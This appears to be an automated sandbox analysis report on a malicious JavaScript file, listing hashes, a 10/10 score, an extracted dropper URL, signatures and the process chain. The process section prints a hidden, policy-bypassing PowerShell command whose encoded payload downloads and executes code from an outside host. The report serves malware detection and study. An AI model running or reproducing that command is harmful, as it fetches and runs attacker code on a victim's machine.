Analysis

  • max time kernel
    0s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    29/12/2023, 21:51

General

  • Target

    04dc5467a7c386247f71226f0c698e04.js

  • Size

    153KB

  • MD5

    04dc5467a7c386247f71226f0c698e04

  • SHA1

    13ce42ea2fceed1e24f341edcdf7dd8ffc12b59b

  • SHA256

    0794efe03e1bb7bd0439fbd6c95fcd7ca2053340c74a65d9f39d9422481a17f4

  • SHA512

    45cc6465944b17fd1b2c9f169bab6bbced95d22febf7271695a4a20b804acdb8ff0e8c816ba49e0273afe0471c3ad06efda1985f0386a66c87fc1e00bf064fc5

  • SSDEEP

    3072:ISj0koCGicyCotUrhRr9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ87:IiiicyxtkRr9Ry9RuXqW4SzUHmLKeMME

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\04dc5467a7c386247f71226f0c698e04.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
        PID:868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      1⤵
        PID:2172

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2172-5-0x000000001B630000-0x000000001B912000-memory.dmp

              Filesize

              2.9MB

            • memory/2172-6-0x0000000001CF0000-0x0000000001CF8000-memory.dmp

              Filesize

              32KB

            • memory/2172-8-0x00000000022A0000-0x0000000002320000-memory.dmp

              Filesize

              512KB

            • memory/2172-9-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

              Filesize

              9.6MB

            • memory/2172-11-0x00000000022A0000-0x0000000002320000-memory.dmp

              Filesize

              512KB

            • memory/2172-10-0x00000000022A0000-0x0000000002320000-memory.dmp

              Filesize

              512KB

            • memory/2172-7-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

              Filesize

              9.6MB

            • memory/2172-12-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

              Filesize

              9.6MB